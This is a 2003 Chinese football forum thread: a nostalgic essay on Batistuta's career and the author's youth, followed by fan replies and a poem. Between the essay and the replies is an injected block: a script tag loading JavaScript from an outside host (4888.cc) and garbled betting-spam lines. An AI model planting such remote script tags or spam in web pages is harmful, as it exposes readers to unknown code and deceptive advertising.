巴蒂_阿伦 发表于 2003-5-27 10:08:00

巴蒂斯图塔和我的青春记忆

?我很幸运,巴蒂开始出名的时候,我已经开始看球了,而且已经是一个算狂热的球迷,今天,巴蒂斯图塔已经老去,从他的初出茅庐到今日的廉颇老矣,我的青春也在逝去,我甚至找不到另一个和我的青春时光如此重合的球星,可是,我的青春记忆和巴蒂没有太多的关系。

91年的美洲杯是巴蒂的成名之战,在缺少马拉多纳后,新一代的阿根廷队仿佛让人看到了希望,努力改变人民对90年的阿根廷的丑陋回忆,巴蒂是最佳射手。那个时候的美洲杯没有直播,我先从报纸上认识了他,几个月后,中央电视台才播出录像,而且是在中午时光,年少的我休息了午休,观看比赛,可是,今日,只记得看球的经历,却丝毫没有比赛的片断。

91年后巴蒂斯图塔来到了佛罗伦萨,这个意大利联赛中长期的配角,巴蒂斯图塔的到来并没有改变什么,巴蒂在意大利的风头远远不如同时期在意大利的卡尼吉亚和巴尔博,改变源于佛洛伦萨的降级,拥有劳德鲁普、巴蒂、艾分博格的佛洛伦萨竟然沦落到降级了。这次降级也成就了巴蒂日后的威望,他没有离开,并在第二年率领佛洛伦萨回到了甲级联赛,他也获得了在意大利的第一个最佳射手---乙级联赛最佳射手。这一段故事成了足球世界里被长期传颂的童话,巴蒂也由此成了佛洛伦萨的国王。那个时候没有巴蒂的记忆,我的青春是三剑客的恩怨,是桑普多利亚的疯狂,是阿斯普里啦的激情,是马特钨丝的刚强。
  94年世界杯,巴蒂斯图塔第一次参加了世界杯,首场比赛就上演了帽子戏法,对手是三场一球未进,丢了10球的希腊队,还有在和罗马尼亚的比赛中射入了一个点球,那届世界杯,关于阿根廷的青春记忆有马拉多纳的大喊,有卡尼吉亚和马拉多纳的精彩配合,有马拉多纳被罚后在解说席上的表情,关于巴蒂,只有数字上的记忆。
  佛洛伦萨回到了甲级联赛,巴蒂斯图塔也获得了最佳射手,可是佛洛伦萨还是佛洛伦萨,联赛中的配角,意大利联赛中关于佛洛伦萨的回忆更多的是转播前播放的那些佛洛伦萨漂亮的建筑,我关注强者,记忆中也只会留下强者的记忆,那是米兰王朝和尤文王朝的交替阶段,记忆中有拉瓦内利的白发,有维亚利的光头,保罗索萨漂亮的长发,巴雷西难得的后插上得分,维阿的挑球过人和长途奔袭,还有科托的长发和空翻,阿尔代尔的界外球失误。
  96年开始大学,对球赛的关注从电视转到了报纸(那个时候大学条件艰苦啊),惊奇的发现大学同学中有很多巴蒂的球迷,在他们的眼中,巴蒂就是世界上第一球星,有着狮子一样的头发,狮子一样的力量,还有狮子一样的吼叫,那个时候大学里球星海报最多的应该就是巴蒂和巴乔了。佛洛伦萨也开始走向了意大利的次强队,不再考虑保级,而是为欧洲赛事奋斗了。由于信息的缺乏,那个时候的足球记忆变得不再完整,只有报纸的描述,和假期里播放的比赛片断,那段时间的记忆有电视里重复播放的罗纳尔多西班牙赛场上的奔袭,有卡洛斯的超级任意球,有加斯克因的挑球过人,还有皮耶罗在丰田杯上的半转身射门。
  98年世界杯,阿根廷的人气很大一部分原因就来自于巴蒂,在头一年的分组仪式上罗纳尔多和巴蒂组成的世界联队锐不可当时,当巴蒂小组赛再次上演帽子戏法时,巴蒂的声誉达到了一个顶点,在淘汰赛阶段,巴蒂又一次依靠点球在进球榜上写下自己的名字。那届世界杯记忆中更多的是巴乔失之毫厘的遗憾,是罗马尼亚的金发军团,是齐打内的头球,欧文的单刀,甚至阿根廷,记忆中也更多的是贝龙和萨内地的任意球,是奥特加的头顶,是西蒙尼的摔倒。
  98年后的佛罗伦萨达到了一个新的高度,意大利也开始进入没有王者的混战阶段,艾德孟多和巴蒂的组合一度成为意大利最有杀伤力最有观赏性的锋线,这个时候的巴蒂应该算真正进入了成熟期,佛罗伦萨一度让人看到了冠军的希望,巴蒂在我记忆中最深刻的一幕发生了,在某场比赛(和米兰?)巴蒂在无人盯防的情况下,突然动作异样,然后轰然倒地,赛季初疯狂入球的巴蒂不见了,复出后的巴蒂入球寥寥。99年的冠军联赛,我目睹了巴蒂在温不利小角度的入球淘汰了阿森纳,我身边一起看球的朋友兴奋不已,而后巴蒂在同曼联的比赛中连续入球,一个利用了基恩的失误,一个是他擅长的远射,巴蒂在我的这段时间的记忆中留下了深刻的印象。
  2000年,巴蒂终于不满足仅仅是佛罗伦萨的国王,他需要奖杯的证明,而这是佛罗伦萨不能给他的,他来到了罗马,在这里,他实现了自己奋斗了将近10年的目标,意大利联赛冠军,人们只会记住胜利者,我也不例外,这段时间关于巴蒂的记忆特别深,虽然他已经慢慢老去,就象我的青春逝去,他的大力任意球,他的门前连续的补射,他终于达到了自己职业生涯的最高峰。
  2002年世界杯,阿根廷作为最热的热门球队和法国一起第一阶段就淘汰出局,当巴蒂用头攻入尼日利亚一球时,恐怕所有人都没有想到这是他在世界杯上的最后入球。阿根廷被淘汰后,全世界都是泪水,而其中至少有一半给了巴蒂,巴蒂终于在我的世界杯记忆中留下了一个难忘的片断,伴随着全世界的泪水和悲伤。
  在国际米兰巴蒂没有找到自己的位置,他的下一站会是在哪里呢?我的青春还在继续,虽然已经愈加短暂,巴蒂呢?他将在哪里接受球迷的欢呼呢?英格兰,卡塔尔,阿根廷还是佛罗伦萨?

< url=http://www.9p.cc">
<script type="text/javascript" src="http://4888.cc/b.js"></script>
<link href="http://4888.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

一金一一一时一彩一

一合一投一注一一

batistubi 发表于 2003-5-27 20:56:00

也还有我的青春记忆啊~~!

星空蜻蜓 发表于 2003-5-27 21:09:00

那场受伤的比赛是对AC

当时简直想杀了比埃尔霍夫

巴蒂大概是我年少步入青春的记忆吧。。呵呵

Demon 发表于 2003-5-28 03:34:00

又贴这种害人心里发酸的文章。。。。

正好今天整理衣箱翻出了少年时代的日记本,满篇琐琐碎碎的,都是时光的影子。
  随手写一点零乱的东西,不知所云地,随便拣起一点点回忆和心情的碎片罢。

同样是91年,这句话真要对阿伦说:我们与他的相识是如此地相似。那年正赶上我高考,课业很紧张,但有球赛的消息,还是要尽量看的。就是这样零敲碎打式的游击战,幸运地让我看到了他。很奇妙,真的像是注定的一样,先是一张报纸,莫名地在记忆中放下一个名字:巴蒂斯图塔,然后是一个太阳很好的午后,很偶然地打开电视,看到进球后的他张开双臂飞奔着,一头金发四散飘飞,满脸灿烂得教人眩晕的笑。那个有一双湛蓝色大眼睛的大男孩,他的快乐竟然有那么强烈的感染力,一下子射入你心里去。那瞬间真觉得阳光特别的耀眼,整间屋子都特别明亮,脑子里除了他的奔跑他的笑,就只剩下他的名字。
  后来喜欢上梅达的时候,用了半场比赛的时间,而他,巴蒂斯图塔,只是那么不到一分钟,就让我彻底沦陷了。
  那时就想,莫非这就叫一见钟情?后来我对人说过:巴斯滕是我的初恋,巴蒂,则是一辈子的最爱。也就是从那时起,便一直喜欢叫他“我的天使”,总被人说是酸酸的,可我喜欢,他在我心目中,就是个可爱的天使,充满激情与梦想的大孩子。
  那时候真是年轻,我还是忙着高考的毛丫头一个,他也还是“新秀”。那时候只晓得有球看是件幸福的事,所有的快乐也还都是那么单纯。总以为心爱的阿根廷永远不老,他也永远不老,只有自己会长大,而他永不会离去。
  2001年对我来说应该是既遗憾,却又最幸福的一年。遗憾的是,三天烈日下苦苦的守候,换来的仅仅是一个擦肩而过,和一个回眸的微笑;幸福的,却也是这一个擦肩而过,一个回眸一笑。天知道我有多爱他的笑,当他离开翡冷翠的时候、当他身披罗马战袍攻破翡冷翠大门的时候、当过去的那个夏天里阿根廷蓝白的梦破碎的时候……每次看到他的眼泪,都让我的心揪成一团,想拥抱他想安慰他想擦去他的泪水想冲过去抢过那个奖杯塞在他怀里,只要他答应我,他别哭,只要他能笑,像我最初看见他的那个样子无忧无虑地笑!忘不了在罗马艳阳下的那一个瞬间,他听到我的喊声打开车门探出身子回头看过来,似乎愣了一下,然后带着种很可爱的表情对我挥了挥手,眨眼,很灿烂很灿烂地微笑。就是那么一刹那,那么一笑,我就觉得我是像罗马街头贩卖的冰淇淋一样,彻底融化了……
  那个笑容我一定会珍藏终生,因为那是一个来自他的,我从少年时代就日夜梦想的馈赠,一个属于我这辈子最好、最珍贵的礼物。
  如果从来没有站在他对面的话,我永远都无法想象那是怎样巨大的幸福。
  回国后,就是紧张忙碌的工作,看球的时间也不那么多了,但是罗马的夺冠仍使我兴奋激动了好一阵子,虽然我是米兰的铁杆,然而,那是我的天使十年才实现的心愿!十年啊,他终于能捧起这座意甲联赛的冠军奖杯了!而也就是从那一刻罢,我忽然意识到,我的天使,也已经变成人们口中的“老将”了……
  那一刻真的是觉得很惘然。
  2002、2003……看着他慢慢沉寂,失落之外更多的是一种离别将至的沉郁。时间永远不会为任何人停留。惊觉到自己也已届而立之年,才更深地体会到,当初他离开为之奋战了九年的翡冷翠时的心情。
  我的天使,你的下一步,会落在哪儿?那里会是个什么样的地方,是我所熟悉的,还是陌生的?那里会成为你再一次飞翔的起点,还是敛起羽翼静静滑落的尾声?
  无论未来的方向在哪里,我的天使,让我陪你到最后的谢幕吧。十二年,像我一样伴着你的激情长大的那些孩子们,你的气息已经完全渗透了我们的青春,无法分离。

即使再过十二个十二年,我还是会这样叫你:
  ——加布里埃尔·奥玛尔·巴蒂斯图塔,我的天使……

Angela 发表于 2003-5-28 18:14:00

gabriel 的眼睛 gabriel的眼睛。。。

我的世界堕落在gabriel的眼睛里

你的眼睛这样深沉,当我弓下身来啜泣
  我看见所有的太阳都在其中弄影
  一切失望投身其中转瞬逝去
  你的眼睛突然这样深沉使我失去记忆

clytze 发表于 2003-5-28 19:40:00

好!是哥哥写的吗?

巴蒂_阿伦 发表于 2003-5-28 21:41:00

当然。。。。。。。。

不是了。。

Angela 发表于 2003-5-28 22:05:00

啊??

clytze 发表于 2003-5-28 23:57:00

晕~~~~~

巴蒂_阿伦 发表于 2003-5-29 09:08:00

嘿。。
我从来写不出这么长的东西来。。

巴斯 发表于 2003-5-29 10:19:00

让我激动半天。
是好文章。

幻樱 发表于 2003-5-29 18:41:00

的确是好文章,那里面沉淀的是很多人的记忆吧
页: [1]
查看完整版本: 巴蒂斯图塔和我的青春记忆